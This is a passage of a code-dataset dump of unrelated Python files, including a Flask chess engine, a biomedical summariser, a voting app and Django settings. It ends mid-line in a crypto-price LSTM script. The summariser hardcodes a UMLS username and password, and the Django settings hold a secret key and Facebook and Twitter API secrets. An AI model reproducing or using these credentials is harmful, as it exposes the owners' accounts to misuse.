plt.xticks(rotation=45)\r\nelif not math.isnan(varB[0]):\r\n plt.ylabel(col[2]) \r\n plt.plot(dates, varB)\r\n plt.xlabel('Dates')\r\n plt.xticks(rotation=45)","sub_path":"csvparser1.py","file_name":"csvparser1.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"70135725","text":"# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\n 案例:利用NumPy实现梯度下降算法预测疾病\r\n 任务:根据体重指数(BMI)和疾病发展的定量测量值(Y)使用梯度下降算法拟合出一条直线 y_hat = aX+b\r\n\"\"\"\r\nimport numpy as np\r\nimport matplotlib.pylab as plt\r\n\r\ndata_path = './data/diabetes.csv'\r\n\r\n\r\ndef load_data(data_file):\r\n \"\"\"\r\n 功能:读取数据文件,加载数据\r\n 参数:\r\n - data_file:文件路径\r\n 返回:\r\n - data_arr:数据的多维数组表示\r\n \"\"\"\r\n data_arr = np.loadtxt(data_file, delimiter=',', skiprows=1)\r\n return data_arr\r\n\r\n\r\ndef normalization(x, a, b):\r\n \"\"\"\r\n 对数据进行归一化操作\r\n \"\"\"\r\n x = (x - b) / (a - b)\r\n return x\r\n\r\n\r\ndef get_gradient(theta, x, y):\r\n m = x.shape[0]\r\n y_estimate = x.dot(theta)\r\n error = y_estimate - y\r\n grad = 1.0/m * error.dot(x)\r\n cost = 1.0/(2 * m) * np.sum(error ** 2)\r\n return grad, cost\r\n\r\n\r\ndef gradient_descent(x, y, max_iter=1500, alpha=0.1):\r\n theta = np.random.randn(2)\r\n\r\n # 收敛阈值\r\n tolerance = 1e-6\r\n\r\n # 计数器\r\n iterations = 1\r\n\r\n is_converged = False\r\n while not is_converged:\r\n grad, cost = get_gradient(theta, x, y)\r\n new_theta = theta - alpha * grad\r\n\r\n # Print cost\r\n print('第{}次迭代,损失值 {:.4f}'.format(iterations, cost))\r\n\r\n # Stopping Condition\r\n if np.sum(abs(new_theta - theta)) < tolerance:\r\n is_converged = True\r\n print('参数收敛!!!')\r\n print('theta的值为:{}'.format(theta))\r\n\r\n if iterations >= max_iter:\r\n is_converged = True\r\n print('已至最大迭代次数{}'.format(max_iter))\r\n print('theta的值为:{}'.format(theta))\r\n\r\n iterations += 1\r\n theta = new_theta\r\n\r\n return theta\r\n\r\n\r\ndef show(x1, theta, y):\r\n # 绘制结果\r\n y_pred = theta[0] + theta[1] * x1[:, 1]\r\n plt.figure()\r\n\r\n # 绘制样本点\r\n plt.scatter(x1[:, 1], y)\r\n\r\n # 绘制拟合线\r\n plt.plot(x1[:, 1], y_pred, c='red')\r\n plt.show()\r\n\r\n\r\ndef main():\r\n \"\"\"\r\n 主函数\r\n \"\"\"\r\n data_arr = load_data(data_path)\r\n x = data_arr[:, 0].reshape(-1, 1)\r\n x = normalization(x, np.max(x), np.min(x))\r\n y = data_arr[:, 1]\r\n y = normalization(y, np.max(y), np.min(y))\r\n x1 = np.hstack((np.ones_like(x), x))\r\n theta = gradient_descent(x1, y, alpha=0.1, max_iter=10000)\r\n show(x1, theta, y)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"145847524","text":"from flask import Flask, Response, request\nimport os\nimport chess\nimport time\nimport chess.svg\nimport traceback\nimport base64\nfrom state import State\nimport torch\nfrom train import Net\n\nMAXVAL = 10000\n\n# Valuator class that uses nn to evalueate the board\n\n\nclass Valuator(object):\n def __init__(self):\n\n vals = torch.load(\"nets/value1M.pth\", map_location=lambda storage, loc: storage)\n self.model = Net()\n self.model.load_state_dict(vals)\n\n def __call__(self, bState):\n brd = bState.serialize()[None]\n output = self.model(torch.tensor(brd).float())\n return float(output.data[0][0])\n\n\n# chess board, \"engine\" and flask app\ns = State()\nv = Valuator()\napp = Flask(__name__)\n\ndef computer_minimax(s, v, depth, a, b, big=False):\n if depth >= 3 or s.board.is_game_over():\n return v(s)\n\n # white is maximizing player\n turn = s.board.turn\n if turn == chess.WHITE:\n ret = -MAXVAL\n else:\n ret = MAXVAL\n\n if big:\n bret = []\n\n # can prune here with beam search\n isort = []\n for e in s.board.legal_moves:\n s.board.push(e)\n isort.append((v(s), e))\n s.board.pop()\n move = sorted(isort, key=lambda x: x[0], reverse=s.board.turn)\n # beam search beyond depth 3\n if depth >= 3:\n move = move[:10]\n\n for e in [x[1] for x in move]:\n s.board.push(e)\n tval = computer_minimax(s, v, depth+1, a, b)\n s.board.pop()\n if big:\n bret.append((tval, e))\n if turn == chess.WHITE:\n ret = max(ret, tval)\n a = max(a, ret)\n if a >= b:\n break # b cut-off\n else:\n ret = min(ret, tval)\n b = min(b, ret)\n if a >= b:\n break # a cut-off\n if big:\n return ret, bret\n else:\n return ret\n\n\ndef explore_leaves(s, v):\n ret = []\n start = time.time()\n begining_eval = v(s)\n print(\"Human move Eval: \", begining_eval, flush=True)\n cval, ret = computer_minimax(s, v, 0, a=-MAXVAL, b=MAXVAL, big=True)\n eta = time.time() - start\n print(\"%.2f -> %.2f: explored in %.3f seconds\" % (begining_eval, cval, eta), flush=True)\n return ret\n\n\n# def to_svg(s):\n# return base64.b64encode(chess.svg.board(board=s.board).encode('utf-8')).decode('utf-8')\n\n@app.route(\"/\")\ndef hello():\n print(\"get /\", flush=True)\n ret = open(\"index.html\").read()\n return ret.replace('start', s.board.fen())\n\n\ndef computer_move(s, v):\n # computer moves\n moves = sorted(explore_leaves(s, v), key=lambda x: x[0], reverse=s.board.turn)\n if len(moves) == 0:\n return\n print(\"top 3:\", flush=True)\n print(moves, flush=True)\n for i, m in enumerate(moves[0:3]):\n print(\" \", m, flush=True)\n print(s.board.turn, \"moving\", moves[0][1], flush=True)\n s.board.push(moves[0][1])\n\n# moves given as coordinates of piece moved\n\n\n@app.route(\"/move_coordinates\")\ndef move_coordinates():\n if not s.board.is_game_over():\n source = int(request.args.get('from', default=''))\n target = int(request.args.get('to', default=''))\n promotion = True if request.args.get('promotion', default='') == 'true' else False\n\n move = s.board.san(chess.Move(source, target, promotion=chess.QUEEN if promotion else None))\n move_check = chess.Move(source, target, promotion=chess.QUEEN if promotion else None)\n\n # Checking if player move is legal\n if move_check not in s.board.legal_moves:\n print(\"illegal move\", flush=True)\n response = app.response_class(response=s.board.fen(), status=0)\n return response\n\n # If move is legal AI makes its move\n if move is not None and move != \"\":\n print(\"human moves\", move, flush=True)\n try:\n s.board.push_san(move)\n computer_move(s, v)\n except Exception:\n traceback.print_exc()\n\n response = app.response_class(response=s.board.fen(), status=200)\n return response\n\n print(\"GAME IS OVER\")\n response = app.response_class(\n response=\"game over\",\n status=200\n )\n return response\n\n\n@app.route(\"/newgame\")\ndef newgame():\n print(\"Game was reset!\", flush=True)\n s.board.reset()\n response = app.response_class(\n response=s.board.fen(),\n status=200\n )\n return response\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","sub_path":"play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":4451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"168138158","text":"\n\n\nimport os\nimport typing\n\nimport jk_pathpatternmatcher2\nimport jk_utils\nfrom jk_typing import checkFunctionSignature\nimport jk_mounting\n\nfrom ..ThaniyaBackupContext import ThaniyaBackupContext\nfrom ..ThaniyaIO import ThaniyaIO\nfrom ..tools.EnumTarPathMode import EnumTarPathMode\nfrom ..tools.ThaniyaTar import ThaniyaTar\n\nfrom .AbstractThaniyaTask import AbstractThaniyaTask\n\n\n\n\n\n\n#\n# This class performs a backup of a Linux/UNIX block device.\n#\nclass TBackupDevice(AbstractThaniyaTask):\n\n\t################################################################################################################################\n\t## Constructor\n\t################################################################################################################################\n\n\t@checkFunctionSignature()\n\tdef __init__(self, devicePath:str, targetFileName:typing.Union[str,None] = None, ensureNotMounted:bool = False):\n\t\tassert devicePath\n\t\tassert os.path.exists(devicePath)\n\t\tassert os.path.isabs(devicePath)\n\t\tassert devicePath.startswith(\"/dev/\")\n\n\t\tassert isinstance(ensureNotMounted, bool)\n\t\tself.__ensureNotMounted = ensureNotMounted\n\n\t\tif targetFileName is not None:\n\t\t\tassert targetFileName\n\n\t\tself.__devicePath = devicePath\n\n\t\tif targetFileName:\n\t\t\tself.__targetFileName = targetFileName\n\t\telse:\n\t\t\tself.__targetFileName = devicePath.replace(\"/\", \"-\")\n\t\t\tif self.__targetFileName.startswith(\"-\"):\n\t\t\t\tself.__targetFileName = self.__targetFileName[1:]\n\t\t\tself.__targetFileName = \"device--\" + self.__targetFileName + \".rawdev\"\n\t#\n\n\t################################################################################################################################\n\t## Public Properties\n\t################################################################################################################################\n\n\t@property\n\tdef logMessageCalculateSpaceRequired(self) -> str:\n\t\treturn \"Determining backup size of device: \" + repr(self.__devicePath)\n\t#\n\n\t@property\n\tdef logMessagePerformBackup(self) -> str:\n\t\treturn \"Performing backup of device: \" + repr(self.__devicePath)\n\t#\n\n\t################################################################################################################################\n\t## Helper Methods\n\t################################################################################################################################\n\n\t################################################################################################################################\n\t## Public Methods\n\t################################################################################################################################\n\n\tdef calculateSpaceRequired(self, ctx:ThaniyaBackupContext) -> int:\n\t\tnSize = ThaniyaIO.getSizeOfDevice(ctx, self.__devicePath)\n\t\tctx.log.info(\"I/O expected: \" + jk_utils.formatBytes(nSize))\n\t\treturn nSize\n\t#\n\n\tdef performBackup(self, ctx:ThaniyaBackupContext):\n\t\tif self.__ensureNotMounted:\n\t\t\tmi = jk_mounting.Mounter().getMountInfoByFilePath(self.__devicePath)\n\t\t\tif mi is not None:\n\t\t\t\traise Exception(\"The device is still mounted: \" + repr(self.__devicePath))\n\n\t\tThaniyaIO.copyDevice(\n\t\t\tctx=ctx,\n\t\t\tsourceDevicePath=self.__devicePath,\n\t\t\ttargetFileOrDirectoryPath=ctx.absPath(self.__targetFileName),\n\t\t\t)\n\t#\n\n#\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"thaniya_client/src/thaniya_client/tasks/TBackupDevice.py","file_name":"TBackupDevice.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"78561323","text":"from flask import Flask, request, render_template\nimport sys\nimport json\nimport csv\nimport sys\nimport os\nimport itertools\nimport numpy as np\nimport operator\nimport types\nimport cPickle as pickle\nimport pickle\nfrom nltk.tokenize import sent_tokenize\nimport re\nimport lucene\nfrom sklearn.cluster import AgglomerativeClustering\nfrom java.nio.file import Paths\n#from org.apache.lucene.analysis.en import EnglishAnalyzer\nfrom org.apache.lucene.analysis.standard import StandardAnalyzer\nfrom org.apache.lucene.document import Document, Field\nfrom org.apache.lucene.search import IndexSearcher, LegacyNumericRangeQuery\nfrom org.apache.lucene.index import MultiReader\nfrom org.apache.lucene.index import IndexReader, DirectoryReader\nfrom org.apache.lucene.queryparser.classic import QueryParser\nfrom org.apache.lucene.store import SimpleFSDirectory\nfrom org.apache.lucene.util import Version\n\nfrom pymedtermino import *\nfrom pymedtermino.snomedct import *\nfrom pymedtermino.umls import *\nfrom pymetamap import MetaMap\n\nfrom Authentication import *\nimport requests\nimport json\nfrom random import randint\n\n#############################################\n\nglobal gen_dir, cache, cuilist, username, password, version, AuthClient, tgt, uri\ngen_dir = \"generatedSummaries\"\n\ncache = {} #{cui:jsonData}\ncuilist=[]\n\n#umls authentication\nusername = \"khyathi\"\npassword = \"Oaqa12#$\"\n#apikey = args.apikey\nversion = \"2016AB\"\n#identifier = args.identifier\n#source = args.source\nAuthClient = Authentication(username,password)\n\n#get TGT for our session\ntgt = AuthClient.gettgt()\nuri = \"https://uts-ws.nlm.nih.gov\"\n\n#initializing lucene parameters\nlucene.initVM()\nanalyzer = StandardAnalyzer()\nreader_first = DirectoryReader.open(SimpleFSDirectory(Paths.get(\"/home/khyathi/Projects/bioasq/medline17n-lucene1/\")))\nsearcher = IndexSearcher(reader_first)\n\n\n#############################################\n\napp = Flask(__name__)\n\n@app.route('/initializeGlobalVariables')\ndef initializeGlobalVariables():\n\tgen_dir = \"generatedSummaries\"\n\ndef similarity(question, sentence):\n\toriginalQuestion = question[0]\n\texpandedQuestion = question[1]\n\toriginalSentence = sentence[0]\n\texpandedSentence = sentence[1]\n\toriginalSimilarity = len(list(set(originalQuestion).intersection(originalSentence)))\n\texpandedSimilarity = len(list(set(expandedQuestion).intersection(expandedSentence)))\n\tsimilarityScore = originalSimilarity + (0.5*expandedSimilarity)\n\t#return similarityScore\n\tquestion1 = question[0] + question[1]\n\tsentence1 = sentence[0] + sentence[1]\n\t#similarity with word2vec tools\n\treturn len(list(set(question1).intersection(sentence1)))\n\n\ndef cluster(sentenceScoreDict,csumm):\n allSents = []\n totalScore = 0\n for key,value in sentenceScoreDict.iteritems():\n totalScore += value\n if len(sentenceScoreDict)!=0:\n avgScore = float(totalScore)/float(len(sentenceScoreDict))\n else:\n avgScore = float(totalScore)\n for key,value in sentenceScoreDict.iteritems():\n if value > avgScore:\n allSents.append(key)\n #allSents = [\"ac is my\", \"this is apple\", \"apple and bottle\", \"and\"]\n sentencePairs = list(itertools.combinations(allSents,2))\n num_clusters=5\n if len(allSents) < 10:\n f = open(gen_dir+\"bioasq.\"+str(csumm)+\".txt\",'w')\n for sent in allSents:\n f.write(sent+\"\\n\")\n f.close()\n return\n model = AgglomerativeClustering(n_clusters=num_clusters, affinity='precomputed', connectivity=None, linkage='average', compute_full_tree='auto')\n X = np.zeros((len(allSents), len(allSents)))\n for i in range( len(sentencePairs) ):\n index1 = allSents.index(sentencePairs[i][0])\n index2 = allSents.index(sentencePairs[i][1])\n distance = 1- similarity( sentencePairs[i][0].split(), sentencePairs[i][1].split() )\n if index1 <= index2:\n X[index1, index2] = distance\n else:\n X[index2, index1] = distance\n class_labels = model.fit_predict(X)\n selectedSents = {}\n for i in range(len(allSents)):\n curClass = class_labels[i]\n curSent = allSents[i]\n if curClass in selectedSents:\n curScore = sentenceScoreDict[curSent]\n if curScore > selectedSents[curClass][1]:\n selectedSents[curClass] = ( curSent , sentenceScoreDict[curSent] )\n else:\n selectedSents[curClass] = ( curSent , sentenceScoreDict[curSent] ) \n score = sentenceScoreDict[curSent]\n #print \"OUR SUMMMAAARRRRRRRRRRRRRRRRYYYYYYYYYYYYYYYYYYYYYYYY\"\n newselectedSents = {}\n for key,value in selectedSents.iteritems():\n newselectedSents[value[0]] = value[1]\n #print newselectedSents\n sorted_ss = sorted(newselectedSents.items(), key=operator.itemgetter(1), reverse=True)\n sumLen=0\n #f = open(gen_dir+\"bioasq.\"+str(csumm)+\".txt\",'w')\n summaryFinal = \"\"\n for pair in sorted_ss:\n summarySentence = pair[0]\n sumLen += len(summarySentence.split())\n if sumLen<=200:\n #f.write(summarySentence+\"\\n\")\n summaryFinal += summarySentence\n #f.close()\n return summaryFinal\n #print selectedSents\n #exit(1)\n\n#@app.route('/readData', methods=['GET', 'POST'])\ndef readData(NoExpansionFlag, UmlsExpansionFlag):\n\t#instantiating metamap\n\tmm = MetaMap.get_instance('/home/khyathi/installations/public_mm/bin/metamap')\n\tstart_command = \"/home/khyathi/installations/public_mm/bin/skrmedpostctl start\"\n\tos.system(start_command)\n\trandomNumber = randint(0, 100)\n\tcsumm=0\n\tinfile = open(sys.argv[1],'r')\n\tdata = json.load(infile)\n\t#c=1\n\tfor (i, question) in enumerate(data['questions']):\n\t\tif question['type'] == 'summary':\n\t\t\tcsumm +=1\n\t\tif csumm != randomNumber:\n\t\t\tcontinue\n\t\t#if csumm >=3:\n\t\t#\tbreak\n\t\tquest = unicode(question['body']).encode(\"ascii\",\"ignore\")\n\t\tquestionBow = quest.split()\n\t\texpandedQuestion = [questionBow] + [[]]\n\t\tif NoExpansionFlag == True:\n\t\t\texpandedQuestion = [questionBow] + [[]]\n\t\telif UmlsExpansionFlag == True:\n\t\t\texpandedQuestion = [questionBow] + [expandConcepts(quest)]\n\t\t#print expandedQuestion\n\t\t#raw_input()\n\t\tideal_summaries = question[\"ideal_answer\"]\n\t\tideal_answer_sents = []\n\t\tif isinstance(ideal_summaries, types.StringTypes):\n\t\t\tideal_answer_sents = sent_tokenize(ideal_summaries)\n\t\telse:\n\t\t\tideal_answer_sents = sent_tokenize(ideal_summaries[0])\n\t\t\"\"\"\n\t\tout = open(\"./ideal_summaries1/bioasq.\"+str(csumm)+\".txt\", \"w\")\n\t\tfor sentence in ideal_answer_sents:\n\t\t\tout.write(unicode(sentence).encode(\"ascii\",\"ignore\")+\"\\n\")\n\t\tout.close()\n\t\t\"\"\"\n\t\tsnippets = question['snippets']\n\t\t#documents = question['documents']\n\t\tsentences = []\n\t\tsentenceScoreDict = {}\n\t\tsnippetsText = []\n\t\tfor snippet in question['snippets']:\n\t\t\ttext = unicode(snippet[\"text\"]).encode(\"ascii\", \"ignore\")\n\t\t\tsnippetsText.append(text)\n\t\t\tif text == \"\":\n\t\t\t\tcontinue\n\t\t\ttry:\n\t\t\t\tsentences += sent_tokenize(text)\n\t\t\texcept:\n\t\t\t\tsentences += text.split(\". \")\n\t\t\t#print sentences\n\t\t\t#exit(1)\n\t\t\t#for document in question['documents']:\n\t\t\t#print document\n\t\t\t#abstractText = unicode( retrieve(document) ).encode(\"ascii\",\"ignore\")\n\t\t\t#if abstractText == \"\":\n\t\t\t# continue\n\t\t\t#try:\n\t\t\t# sentences += sent_tokenize(abstractText)\n\t\t\t#except:\n\t\t\t# sentences += abstractText.split(\". \")\n\t\tfor sentence in sentences:\n\t\t\tsentenceBow = sentence.split()\n\t\t\texpandedSentence = [sentenceBow] + [[]]\n\t\t\tif NoExpansionFlag == True:\n\t\t\t\texpandedSentence = [sentenceBow] + [[]]\n\t\t\telif UmlsExpansionFlag == True:\n\t\t\t\texpandedSentence = [sentenceBow] + [expandConcepts(sentence)]\n\t\t\tsimilarityScore = similarity(expandedQuestion, expandedSentence)\n\t\t\tsentenceScoreDict[sentence] = similarityScore \n\t\tsummaryFinal = cluster(sentenceScoreDict,csumm)\n\t\t#print \"generated summary \" + str(csumm)\n\t\t#question = \"When does the antipeptic action of bisabolol occur with a pH-value?\"\n\t\tpickle.dump(cache, open(\"cached_umls_json.pkl\",\"wb\"))\n\t\tpickle.dump(cuilist, open(\"cui.pkl\",\"wb\"))\n\t\tstop_command = \"/home/khyathi/installations/public_mm/bin/skrmedpostctl stop\"\n\t\t#stop_command = \"~/public_mm/bin/skrmedpostctl stop\"\n\t\tos.system(stop_command)\n\t\t#exit(1)\n\t\treturn (quest, snippetsText, summaryFinal)\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n\tinitializeGlobalVariables()\n\tUmlsExpansionFlag = False\n\tNoExpansionFlag = False\n\t#if UmlsExpansionFlag == False and NoExpansionFlag==False:\n\t#\treturn (\"\",\"\",\"\")\n\tif request.method == 'POST':\n\t\tif request.form['submit'] == 'UMLS Expansion':\n\t\t\tUmlsExpansionFlag = True\n\t\telif request.form['submit'] == 'No Expansion':\n\t\t\tNoExpansionFlag = True\n\tquestion, snippets, summaryFinal = readData(NoExpansionFlag, UmlsExpansionFlag)\n\treturn render_template(\"bioasq.html\", question = question, snippets = snippets, summaryFinal = summaryFinal)\n\t#return 'Welcome to the homepage of bioasq'\n\n@app.route('/load', methods=['GET', 'POST'])\ndef load():\n\treturn 'This is the image'\n\nif __name__ == \"__main__\":\n\tapp.run(debug = True)","sub_path":"webservice/safebasic2.py","file_name":"safebasic2.py","file_ext":"py","file_size_in_byte":8665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"52648810","text":"from datetime import datetime\r\n\r\nimport sqlalchemy\r\nfrom flask import render_template, request, Response\r\n\r\nfrom app import app, db, logger\r\n\r\n\r\n@app.before_first_request\r\ndef create_tables():\r\n # Create tables (if they don't already exist)\r\n with db.connect() as conn:\r\n conn.execute(\r\n \"CREATE TABLE IF NOT EXISTS votes \"\r\n \"( vote_id SERIAL NOT NULL, time_cast timestamp NOT NULL, \"\r\n \"candidate CHAR(6) NOT NULL, PRIMARY KEY (vote_id) );\"\r\n )\r\n\r\n\r\n@app.route(\"/\", methods=[\"GET\"])\r\ndef index():\r\n votes = []\r\n with db.connect() as conn:\r\n # Execute the query and fetch all results\r\n recent_votes = conn.execute(\r\n \"SELECT candidate, time_cast FROM votes \" \"ORDER BY time_cast DESC LIMIT 5\"\r\n ).fetchall()\r\n # Convert the results into a list of dicts representing votes\r\n for row in recent_votes:\r\n votes.append({\"candidate\": row[0], \"time_cast\": row[1]})\r\n\r\n stmt = sqlalchemy.text(\r\n \"SELECT COUNT(vote_id) FROM votes WHERE candidate=:candidate\"\r\n )\r\n # Count number of votes for tabs\r\n tab_result = conn.execute(stmt, candidate=\"TABS\").fetchone()\r\n tab_count = tab_result[0]\r\n # Count number of votes for spaces\r\n space_result = conn.execute(stmt, candidate=\"SPACES\").fetchone()\r\n space_count = space_result[0]\r\n\r\n return render_template(\r\n \"index.html\", recent_votes=votes, tab_count=tab_count, space_count=space_count\r\n )\r\n\r\n\r\n@app.route(\"/\", methods=[\"POST\"])\r\ndef save_vote():\r\n # Get the team and time the vote was cast.\r\n team = request.form[\"team\"]\r\n time_cast = datetime.datetime.utcnow()\r\n # Verify that the team is one of the allowed options\r\n if team != \"TABS\" and team != \"SPACES\":\r\n logger.warning(team)\r\n return Response(response=\"Invalid team specified.\", status=400)\r\n\r\n stmt = sqlalchemy.text(\r\n \"INSERT INTO votes (time_cast, candidate)\" \" VALUES (:time_cast, :candidate)\"\r\n )\r\n try:\r\n with db.connect() as conn:\r\n conn.execute(stmt, time_cast=time_cast, candidate=team)\r\n except Exception as e:\r\n logger.exception(e)\r\n return Response(\r\n status=500,\r\n response=\"Unable to successfully cast vote! Please check the \"\r\n \"application logs for more details.\",\r\n )\r\n\r\n return Response(\r\n status=200,\r\n response=\"Vote successfully cast for '{}' at time {}!\".format(team, time_cast),\r\n )\r\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"637903783","text":"from pinry.settings import *\n\nimport os\n\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(SITE_ROOT, 'development.db'),\n }\n}\n\nSECRET_KEY = 'ZDQyMDBjZDYtYjVlZS00ZGEzLWJlMzktMWVhM2Q0NDM4OWIz'\n\n# facebook config\nFACEBOOK_APP_ID = '434190746638873'\nFACEBOOK_API_SECRET = '7301d5cd2d4d29ae0474b762490ab42c'\nFACEBOOK_EXTENDED_PERMISSIONS = ['publish_stream']\n\n# twitter config\nTWITTER_CONSUMER_KEY = 'j9QEx1MjA9nOi2rlS5fFg'\nTWITTER_CONSUMER_SECRET = 'irBDnv1HM0eHxxcVJUJG53g42s8qRFs9yA1VUjVRcRM'\n","sub_path":"pinry/settings/development.py","file_name":"development.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"307807325","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('accounts', '0002_auto_20150321_2315'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Holding',\n fields=[\n ('id', models.AutoField(auto_created=True, serialize=False, verbose_name='ID', primary_key=True)),\n ('symbol', models.CharField(max_length=10)),\n ('quantity', models.DecimalField(default=-1, decimal_places=2, max_digits=8)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AlterField(\n model_name='account',\n name='account_type',\n field=models.IntegerField(choices=[(0, 'brokerage'), (1, 'ira'), (2, 'roth ira'), (3, '401k'), (4, 'roth 401k')], default=0),\n preserve_default=True,\n ),\n ]\n","sub_path":"financemanagerapi/accounts/migrations/0003_auto_20150322_0010.py","file_name":"0003_auto_20150322_0010.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"484000543","text":"from c2_bicycle_classes import *\n\ncust = [customers(\"deah\",500), customers(\"thas\",200), customers(\"rehm\",1000)]\n\nwheel_list=[wheels('26\"\"',3,30),\n wheels('28\"\"',5,90),\n wheels('24\"\"',5,180)]\n \nframes_list=[frames('aluminium',14,60),\n frames('carbon',12,60),\n frames('steel',16,250)]\n\nman1_model=['harry','rosa','birdy']\nman2_model=['cube','merlin','iride']\n\nman1=manufacturer(\"Derby\",wheel_list,frames_list,man1_model,1.3)\nman2=manufacturer(\"Avanti\",wheel_list,frames_list,man2_model,1.2)\ncycle=bicycle(man1.model,man2.model)\nshop=bikeshop(\"costco\",cycle.m1)\n\nprint(\"\\nInitial Inventory\")\nshop.stock()\n\nprint(\"\\ncustomers list\")\nfor customer in cust:\n afford=shop.afford(customer.name,customer.fund)\n\nprint(\"inventory after sales\")\nshop.stock()\nprint(\"\\nProfit ${}\".format(int(shop.t)))\n","sub_path":"c2_main.py","file_name":"c2_main.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"557711829","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__), \"../\"))\nimport pandas\nimport matplotlib.pyplot as plt\nimport data_loader\nimport numpy\nimport math\nimport argparse\nimport keras\nimport plotly.offline as py\nimport plotly.graph_objs as go\nfrom keras.optimizers import Adam\nimport logging\n\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.externals import joblib\nfrom keras.callbacks import CSVLogger\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO)\n\ncheckpoint_name = 'model1'\n\nif not os.path.isdir(os.path.join(os.path.dirname(__file__), 'checkpoint/{}'.format(checkpoint_name))):\n dire = os.path.join(os.path.dirname(__file__), 'checkpoint/')\n os.system(\"cd {}; mkdir {}\".format(dire, checkpoint_name))\n\nparser = argparse.ArgumentParser(description='Predict crypto prices')\nparser.add_argument('-v', '--visualize', action='store_const',\n const=True, default=False,\n help='Only visualize results of previously saved model')\nparser.add_argument('-r', '--resume', action='store_const',\n const=True, default=False,\n help='resume from previous checkpoint')\n\nargs = parser.parse_args()\n\n\n\"\"\"Get Data\"\"\"\ndataset = data_loader.getCandles('ETH-USD', 60, '2018-02-01T00:00:25+01:00', '2018-05-01T00:00:25+01:00')[['open']]\n\n\"\"\"###Normalize data\"\"\"\n\n# normalize the dataset\nscaler = MinMaxScaler(feature_range=(0, 1))\nscaler.fit(dataset)\ndataset = scaler.transform(dataset)\nscaler_path = os.path.join(os.path.dirname(__file__), 'checkpoint/{}/scaler.pkl'.format(checkpoint_name))\njoblib.dump(scaler, scaler_path)\n\n\"\"\"###Split data into training and test. Training is the past, test is the future.\"\"\"\n\n# split into train and test sets\ntrain_size = int(len(dataset) * 0.7)\ntest_size = len(dataset) - train_size\ntrain, test = dataset[0:train_size,:], dataset[train_size:len(dataset),:]\nprint(len(train), len(test))\n\n\"\"\"###Convert data into pairs: (features, targets)\"\"\"\n\n# convert an array of values into a dataset matrix\ndef create_dataset(dataset, look_back=1):\n\tdataX, dataY = [], []\n\tfor i in range(len(dataset)-look_back-1):\n\t\ta = dataset[i:(i+look_back), 0]\n\t\tdataX.append(a)\n\t\tdataY.append(dataset[i + look_back, 0])\n\treturn numpy.array(dataX), numpy.array(dataY)\n\n\n# reshape into X=t and Y=t+1\nlook_back = 1\ntrainX, trainY = create_dataset(train, look_back)\ntestX, testY = create_dataset(test, look_back)\n\nprint(testY.shape)\nprint(testY)\n\"\"\"###Reshape data to fit the LSTM expected format (samples, time_steps, features)\"\"\"\n# reshape input to be [samples, time steps, features]\ntrainX = numpy.reshape(trainX, (trainX.shape[0], 1, trainX.shape[1]))\ntestX = numpy.reshape(testX, (testX.shape[0], 1, testX.shape[1]))\nprint(trainX.shape)\nprint(testX.shape)\n\n\"\"\"###Build a very simple LSTM with 4 nodes connected to a 1 neuron output layer:\"\"\"\n\n# create and fit the LSTM network\nmodel = Sequential()\n# model.add(LSTM(4, input_shape=(1, look_back)))\nmodel.add(LSTM(256, input_shape=(1, look_back), return_sequences=True))\nmodel.add(LSTM(256))\n# model.add(LSTM(4, batch_input_shape=(1, 1, look_back), stateful=True))\nmodel.add(Dense(1))\n\nmodel.summary()\n\n\n\"\"\"### Checkpointing \"\"\"\ncheckpoint_path = os.path.join(os.path.dirname(__file__), 'checkpoint/{}/weights.hdf5'.format(checkpoint_name))\nmodel_path = os.path.join(os.path.dirname(__file__), 'checkpoint/{}/model.hdf5'.format(checkpoint_name))\ncheckpointer = ModelCheckpoint(filepath=checkpoint_path, verbose=1, save_best_only=True)\ncsv_logger = CSVLogger(model_path+\".log\")\n\nif args.resume and os.path.isfile(checkpoint_path) and os.path.isfile(model_path):\n model.load(model_path)\n model.load_weights(checkpoint_path)\n print('Loaded weigths from checkpoint: {}'.format(checkpoint_path))\nelse:\n print('No checkpoint found.')\n\n\n\"\"\"###Define the loss and optimizer. Train the model.\"\"\"\nadam = Adam(lr=0.001, 